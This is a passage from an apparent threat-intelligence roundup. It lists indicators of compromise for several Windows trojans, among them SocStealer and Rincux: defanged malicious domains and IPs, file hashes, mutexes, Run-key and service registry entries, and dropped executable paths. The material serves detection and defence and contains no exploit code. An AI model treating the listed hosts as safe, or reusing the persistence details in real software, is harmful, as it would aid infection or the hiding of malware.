                  • www[.]selfdislikedfarfet[.]site
                  • www[.]quaintspokenracketiest[.]site
                  • www[.]millesimalnonremuneration[.]site
                  • www[.]secularistsarakolet[.]site
                  Files and or directories created
                  • \TEMP\0533852f18624569fbef4cf6677063a92fbd695b3ea36e003da95999d6c8d9cb.exe
                  File Hashes
                  • 0533852f18624569fbef4cf6677063a92fbd695b3ea36e003da95999d6c8d9cb
                  • 0a3c71a1b1e82e87de944e0c2672f97db0e78a076124b00692233414a8054cb8
                  • 0b49337bc87bdcef167fa6b7313c23a836e9a5a45f827ba0eca7262901b9770c
                  • 2299fb45a9a7f48d618c33d665bb0c88ea5545c86ba4ea05fbdb73dc38de96a5
                  • 24bd0b9517591458af75b8f1ad1b59e57fc6fe9eeaa41086d31c55a4c259e12d
                  • 27ef5e8a51c44b6351ea13af6454ce7c34d506c604d9eb6366c7b98ce70a37b4
                  • 293580f6560d8d9b4d3a413dedd347f2cad79bf7e9f22519d9b60cfdb0f52fc6
                  • 2d2582eba24d58be4ca332a30daf4fd42d95e25986446b464f465c8dbcc08572
                  • 30f73c131ca8864f57d5c3501ad7e75be30eb8bafb79f9ce0c9becca4813c7fc
                  • 33dc66ca6d18acaff3ee13baa7a2f925f5b0bd4dc8ea9436e4e5aecc57775fe0
                  • 3726d3185b6aa67c425b7e1866ac424284737df53df1c83e9a040428837c4a8c
                  • 37d65942c6ae66de3fbcbbbab3e184f4c566cbb4cc0c6bc3060dab27df15da5d
                  • 563a41f03cd9f6e1917b486ec1de9ef941f7449f3bf2635f7fa6186455db01c5
                  • 69137a62cfc2e60c5d2915d919fe987fa94c1510bdd180bc3079330f1897bb64
                  • 725f01277f2b4f35a17ea0d3e61a910b8c118ec5f70405fa359a1a0ee0e4e525
                  • 72c6f63cd23d2de81ca96f7246efc9e11a1c8ae9e8f41755aea03ef067ae484b
                  • 831cc8a05f15820256cc41705cd3fe96f38bf3dbb61372b48d229b81922b15dd
                  • 90d6515b29f9f59d551f8f170b731f9831ab63a2a8f6d70358cee6d5df519efa
                  • 9ddb4d20633a371d2ab3858f4c74ce2c2d55804c40aedde9b46afcc98db8f709
                  • a5716b4266066ed231e6c207cf2850627c3c8fa84d2e96e8ebf65f8f918538d6
                  • b9121f992ba17130ce6429aba0c47138b059b0c8aec2cb36ab446361c95eb238
                  • bc2451362e8658b64bdf2421c4c73e9c35cfbdcf370944e9482fa496b6a91d5a
                  • e9757f25588b668b1708788639ba3dcc0c5a0010f425d19ca667e5d70e0e5939
                  • ee2b22547da7ebcef73af0dcd8dccb1b25bb2a13f09b2b563015b34c24562ebc
                  • f13483a7ec5d329e5da2901fa9f3fcea6eff6e4cb1724200df114d214a8cd0bf

                  Coverage


                  Screenshots of Detection

                  AMP


                  ThreatGrid



                  Umbrella







                  Win.Trojan.Generic-6417450-0


                  Indicators of Compromise


                  Registry Keys
                  • N/A
                  Mutexes
                  • N/A
                  IP Addresses
                  • 104[.]27[.]162[.]68
                  Domain Names
                  • c[.]lewd[.]se
                  Files and or directories created
                  • N/A
                  File Hashes
                  • 26164675ee05afb06a76f8d9a8b27b11562b3576aee5bffcc4d83e9e7c3a7a16
                  • cd60a72e6afe723faf2a470d4c664f91c15691f149cb03db96e9e0e6806e3897
                  • 4a07fa4e68366bebf3873736b28354500000814d63154538e66f65e6aa70a853
                  • a148d91ebbc97e53b4febc23960ee0d1f3170bb4625c94deeb0ad32e7ac28ee3
                  • a86662848047586347e4fe38341e67c43eef8c83738e22376a7bd992d11f26b6
                  • a555f788fabda605dd622c7a3320ae31840fb302b82a7d05a981e37cee0d11b2
                  • 243359e04224afa42981cfb9a24c269ddb8adc0c1d49839aa7ad8a929c22e3c7
                  • 007be09ba9b3ad3beb5e6ba63a1cec3ea9985b6bb261c7152de3f8e9f558ce2d
                  • 7bf374cf242a630ca540616e870b575fb63e674c90d24626c656c148b2156ee6
                  • 3ef315249309fd118662b78bb1923afd71d7f7876fbed516d573ccf6e70182c1
                  • 0d8031a8b9e1f5aa16fc7c82115565d1d468a8f4f3a828339eceb901f76b5577
                  • 9a5cde6f48c1fb2b1fcdce11e8b9e72a0f23910c05b6420c78e3c027033e09c0
                  • 59b04b8760f88213171dd6b45b5d4d85dc7b9b5f86a976a3eff2e9c27f135929
                  • ce533f8f084a79294aa1254db01fd630dab95ccff22124d9fb4c51fe16a2948a
                  • fe04dde6a78fdb8029ead6f87d072ec7b2b9f530e6d4913e296903b34ea64176
                  • 49fbf92ef158694f0ed792403f7a066d88831ba71e5f4018f707010f2627210d
                  • 698b7960c7aa2703b7468a6867adfc13a68c31390ae47132de34efb2dab7ae39
                  • 4dd1f3fd4c4548bd757bf4f88d8d0a3d6e4359a5c41f8b4dbf0a44028a2d73ae
                  • 56a0ecc8d86810358cdacd8ea41f6dfce683c5121226d906a418b5a15060b9f9
                  • 58c6f5ef2df1e08a36a51ed36a3ae15ee2ab05b3046ccca1a09526640316e079
                  • d1e6d2ba273fed39c272d2d944dd244bd6566f38b5dad94637af147c44355e80
                  • c4b6809128e9a17a0b5032ea34b373095940f488544bd0350293a175e0079b2b
                  • fb39b3f2ade2fa2754493d3d1208facf01c2ece961aa7c6e1e1f10607c9d4962
                  • 018fad91a80cd1ff5328bf6ee3fe613b563eea547d23d22cd708d76cedbc578b
                  • e1673a3ed97150082c0e89712386c71f6feb8fd1d7428fe633cfae0d1ca9baba

                  Coverage


                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella







                  Win.Trojan.Generic-6417989-3


                  Indicators of Compromise


                  Registry Keys
                  • <HKU>\Software\Microsoft\Windows\CurrentVersion\Run
                  Mutexes
                  • DBWinMutex
                  IP Addresses
                  • 216[.]218[.]185[.]162
                  Domain Names
                  • cbunahtesting[.]com
                  Files and or directories created
                  • %AppData%\5145C9BD\bin.exe
                  File Hashes
                  • 05beeee9353e581e5e0fad00ef8b88f90f911a45411dd52b620fc2cc73ba1e85
                  • 7ca99c0c24283ff2b6f8e0f81ba7edcb17948e4fee7bc8c3cc22d5026c455f4a
                  • c247197bf71c4fadbc4e267888f6c416f4775c07a1fc8aa8d0d1144b5ba1db36
                  • 100c808616f05668a9c73101e9dce21702e8bf241f82374eb5aa5f0646cca3e4
                  • 744a6e99676a89e8cfd2b0ff2c540f2500f1afc5dc541e3611b0dc04973244ef
                  • d8781d7dd2e9cc4b029a9147cf5691c8622b15b1bdbd438f8cd1443e9c268a31
                  • 7f7b2e315d47d3b8874517443888e229aa738f211e3ebcaa67d6859539e439bb
                  • 3ab29f60bf807759931c817cb40a42140296364fa8a5e0b032e8a6851accce5c
                  • 4bbf688503c81af93e8c598242c0a087b57aaa4c95fedb3193e4a021e535fde0
                  • 2e965a7d0769b37a6e4af06db67592b3b0778b6929936bf8b4af8ef370af7eca

                  Coverage


                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella







                  Win.Trojan.Rincux-6417593-0


                  Indicators of Compromise


                  Registry Keys
                  • N/A
                  Mutexes
                  • N/A
                  IP Addresses
                  • N/A
                  Domain Names
                  • N/A
                  Files and or directories created
                  • %WinDir%\{BCE28CAE-5ABE-4a95-871F-99EC11C0AA0A}.exe
                  • %WinDir%\{21581114-3E37-4566-BDFF-D20147EC1489}.exe
                  • %WinDir%\{CB20A050-980B-4166-80A0-C40DD09170BD}.exe
                  • %WinDir%\{A2201725-11C8-4a99-97BF-FF6A9C385D0B}.exe
                  File Hashes
                  • e1447fc8b4e8dbf342f8d89c291979bcf1102244f432e25c704d2d504458276a
                  • 5cf36cb510ce50c61e02f273439987e413f8de1d71a85788e9fcc0639bab0947
                  • 4e6d866520ad1ac811b2ccfe95376194d39c5b4fbd110f0d8135d2af69aeb3ce
                  • c863e0b35242e38e72d82cb5e1aae245816405583e800dedbb3705e42ca66290
                  • eaa28566211fb0784bfdb173b4685dfb57d644a82559c5e6402f024e04cb1f86
                  • 7e21525165a5c2314e80458cee08d1bfcbbbf27ebb4b4dfb838f0a957b2053fb
                  • c688f5d47654368b1497692d2a50ba1b1e57624452f7f359f85db65ce1fbd2ca
                  • f97592b069b8bc6a26af88d312e3af83da88d483ad76aeb5a6a782a5e5dc8a54
                  • f480682591f7bb7a5c66f32c0ae20bf47c6f8fb4dfefac1e27e0ab7fe1d9fe69
                  • 69fb4279770e54269e5e60f47e8d015f01e79da5e4ea80a9e896ceb2176505dd
                  • f48445efb3d70f7578ff1cb60508d3dc57e5a5240ab3196694a25e5a99355cdf
                  • c99f8764e6e4c11773b2d229a3dc335aca8783630c5a4620c5671d6b8cde3dfd
                  • f463eeeccc175d90def65b4e65e504fe50c9fb413aa9f8178d8fa777062216e0
                  • c4d2b74d66362f926e99ab1a89f46e311d789e28eafabffb9668278422403c01
                  • f816a1a589c791c36a2724551a5cd76590415dc449f27b1dff724af73f216382
                  • 45198fe505ee4983fd007576cefeb56502f04d1787fde7d446d2263334fad33a
                  • 4dc57fce4bfd27dc132183e62d5f52aff7dfebca2e5787075eaa6193ad5a4215
                  • 28c348a5c96ca0464bc972e574b31cf4ee57a4955e99d8966b6bdee8b16652ac
                  • eef8802720faea54224cdd4147c7b19db4af84a4dac310322ade1d374436436c
                  • 90559e71cf6d6a27a9ff490a31d2b10c914708f2288fee837e2b7fabdbeb350d
                  • a244aea82e33f99002238bf84ed4e17bbcf45857393056c96f1294bda1b5fdcc
                  • 99b1a18b219ff4f709586e736b9dc93d8fa0f31e0ab8ac97db2553411fab5329
                  • 598cb724819f5dd1ddb7921c9f1ebc3a5b37380f3ab812dd22d89c085c489b8c
                  • 85cbd0c99f4e8293c2a0edfc759baade5a536e983c24cd5e0a9cb869725e4cf3
                  • 26a8d667aee3819c597636a1643413f3146262343ef6442cbdef681f0f6c75e1

                  Coverage


                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Screenshot






                  Win.Trojan.SocStealer-6418271-1


                  Indicators of Compromise


                  Registry Keys
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
                    • Value: CachePrefix
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
                    • Value: AutoDetect
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
                    • Value: CachePrefix
                  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\HNSERVICE\PARAMETERS
                    • Value: ServiceDll
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
                    • Value: UNCAsIntranet
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                    • Value: ProxyEnable
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                    • Value: ProxyServer
                  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\HNSERVICE
                    • Value: DisplayName
                  • <HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION
                    • Value: PnpInstanceID
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
                    • Value: SavedLegacySettings
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
                    • Value: IntranetName
                  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\HNSERVICE
                    • Value: Start
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
                    • Value: CachePrefix
                  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\HNSERVICE
                    • Value: ObjectName
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                    • Value: ProxyServer
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
                    • Value: SavedLegacySettings
                  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\HNSERVICE
                    • Value: Description
                  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\HNSERVICE
                    • Value: WOW64
                  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
                    • Value: ProxyBypass
                  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
                    • Value: IntranetName
                  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SVCHOST
                    • Value: HNServiceGroup
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                    • Value: AutoDetect
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
                    • Value: CachePrefix
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
                    • Value: _ObjectId_
                  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\HNSERVICE
                    • Value: Type
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
                    • Value: DefaultConnectionSettings
                  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\HNSERVICE
                    • Value: ErrorControl
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
                    • Value: CachePrefix
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                    • Value: AutoConfigURL
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                    • Value: ProxyEnable
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                    • Value: AutoDetect
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
                    • Value: _FileId_
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
                    • Value: AeProgramID
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                    • Value: ProxyOverride
                  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\HNSERVICE
                    • Value: ImagePath
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
                    • Value: ProxyBypass
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
                    • Value: CachePrefix
                  • <HKU>\S-1-5-21-2580483871-590521980-3826313501-500_CLASSES\LOCAL SETTINGS\MUICACHE\3A\52C64B7E
                    • Value: LanguageList
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
                    • Value: 10000000095A9
                  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
                    • Value: DefaultConnectionSettings
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                    • Value: ProxyOverride
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
                    • Value: AutoConfigURL
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\00000000000029D3
                    • Value: ObjectId
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CTLs
                  • <HKU>\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CTLs
                  • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CRLs
                  • <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\Certificates
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\SMARTCARDROOT\CRLs
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CRLs
                  • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
                  • <HKU>\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed
                  • <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\CA\CRLs
                  • <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\SmartCardRoot
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\Certificates
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLs
                  • <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\DISALLOWED\CTLs
                  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates
                  • <HKU>\.DEFAULT\Software\Microsoft\SystemCertificates\CA
                  • <HKU>\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
                  • <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\TrustedPeople
                  • <HKLM>\Software\Wow6432Node\Microsoft\EnterpriseCertificates\Disallowed
                  • <HKU>\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
                  • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
                  • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLs
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CTLs
                  • <HKLM>\SYSTEM\CurrentControlSet\Services\HNService\Parameters
                  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLs
                  • <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\ROOT\CTLs
                  • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CTLs
                  • <HKLM>\SYSTEM\CurrentControlSet\Services\HNService
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLs
                  • <HKU>\.DEFAULT\Software\Microsoft\SystemCertificates\trust
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates
                  • <HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
                  • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CTLs
                  • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\Certificates
                  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLs
                  • <HKLM>\Software\Wow6432Node\Microsoft\EnterpriseCertificates\Root
                  • <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\TRUST\CRLs
                  • <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLs
                  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CTLs
                  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
                  • <HKU>\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed
                  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\trust
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\SMARTCARDROOT\CTLs
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLs
                  • <HKU>\.DEFAULT\Software\Microsoft\SystemCertificates\Root
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLs
                  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\Certificates
                  • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CTLs
                  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CRLs
                  • <HKU>\.DEFAULT\Software\Microsoft\SystemCertificates\My
                  • <HKU>\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople
                  • <HKU>\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust
                  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLs
                  • <HKLM>\Software\Microsoft\RAS AutoDial
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLs
                  • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLs
                  • <HKLM>\System\CurrentControlSet\Control\SecurityProviders\Schannel
                  • <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\TRUSTEDPEOPLE\CRLs
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\Certificates
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\SMARTCARDROOT\Certificates
                  • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\Certificates
                  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\TrustedPeople
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLs
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLs
                  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLs
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\SMARTCARDROOT\CTLs
                  • <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\Root
                  • <HKU>\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA
                  • <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\CA\CTLs
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\Certificates
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
                  • <HKLM>\Software\Wow6432Node\Microsoft\EnterpriseCertificates\TrustedPeople
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\Certificates
                  • <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\ROOT\Certificates
                  • <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\TRUST\Certificates
                  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLs
                  • <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\AuthRoot
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\SMARTCARDROOT\Certificates
                  • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Svchost
                  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\HNService
                  • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CRLs
                  • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLs
                  • <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\CA\Certificates
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates
                  • <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\ROOT\CRLs
                  • <HKLM>\Software\Wow6432Node\Microsoft\EnterpriseCertificates\CA
                  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs
                  • <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\DISALLOWED\CRLs
                  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\CA
                  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\Certificates
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLs
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLs
                  • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLs
                  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Disallowed
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CRLs
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\Certificates
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CTLs
                  • <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\TRUST\CTLs
                  • <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\Disallowed
                  • <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\TRUSTEDPEOPLE\Certificates
                  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CTLs
                  • <HKLM>\Software\Wow6432Node\Microsoft\DownloadManager
                  • <A>\{33CA8D6D-A479-11E7-BE8F-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
                  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\Certificates
                  • <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\trust
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLs
                  • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLs
                  • <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\CA
                  • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\SMARTCARDROOT\CRLs
                  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Root
                  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\Certificates
                  • <HKLM>\Software\Wow6432Node\Microsoft\EnterpriseCertificates\trust
                  • <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\DISALLOWED\Certificates
                  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLs
                  • <HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
                  • <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\TRUSTEDPEOPLE\CTLs
                  Mutexes
                  • Installer20171023
                  IP Addresses
                  • 104[.]238[.]156[.]230
                  • 45[.]76[.]142[.]144
                  • 52[.]85[.]146[.]50
                  • 157[.]240[.]18[.]35
                  • 45[.]76[.]241[.]231
                  Domain Names
                  • api[.]new-api[.]com
                  • m[.]facebook[.]com
                  • d3vzyycpfbk7qm[.]cloudfront[.]net
                  • api[.]kkkkkdajlhlkjhsdewgtuv[.]com
                  • down[.]kaidandll[.]com
